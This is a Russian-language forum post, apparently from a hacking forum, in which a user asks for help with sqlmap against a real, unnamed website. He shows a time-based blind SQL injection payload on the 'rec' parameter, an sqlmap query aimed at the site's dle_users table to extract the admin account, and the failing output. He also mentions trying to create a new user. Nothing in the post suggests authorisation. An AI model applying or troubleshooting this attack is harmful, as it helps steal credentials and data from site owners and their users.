Ваши вопросы по уязвимостям.

#11

28.06.2012, 14:39

Dmit3Y

Познающий

Регистрация: 19.07.2010

Сообщений: 45

С нами: 8324246

Репутация: 0

Вопрос по склмап.

Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел.

Иньекция:

Код:

---
Place: GET
Parameter: rec
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: rec=83990 AND SLEEP(5)
---

Пытаюсь получить хоть что-то из бд:

Код:

./sqlmap.py  --url=адрес --sql-query="SELECT name  FROM db_name.dle_users;"

Вывод:

Код:

[09:27:24] [WARNING] the SQL query provided does not return any output
[09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
SELECT name FROM db_name.dle_users;:     None

Любые попытки получить информация заканчиваются именно так.

Один раз был такой вывод:

Код:

SELECT user_id FROM db_name.dle_users; [4]:[*] B[*] [*] ![*] A

Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку.